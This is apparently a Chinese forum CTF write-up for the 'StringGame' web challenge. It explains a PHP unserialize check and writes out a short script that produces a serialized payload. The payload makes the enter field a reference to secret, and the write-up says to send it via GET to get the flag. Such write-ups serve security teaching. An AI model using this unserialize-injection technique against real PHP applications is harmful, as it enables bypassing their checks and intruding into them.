StringGame
首先查看页面信息,一片空白查看源码
这段代码的意思是:
先定义了一个just4fun的类,里面有两个变量,enter以及secret。
接下来是判断,如果通过GET请求得到一个pass变量,并将用户传上来的pass变量赋值给变量pass
进行一个get_magic_quotes_gpc函数判断,如果能取到这个函数返回的长整数。就删除pass变量里的反斜杠。
接下来是将pass反序列化给o
最后一个判断o里面的secret如果和enter相等,就出flag
可以自己写一个php文件执行一下
<?php
class just4fun{
var $enter;
var $secret;
}
$o=new just4fun;
$o->enter=$o->secret;
echo serialize($o);
php>
执行之后:
O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}
通过GET的方式,上传上去!
页:
[1]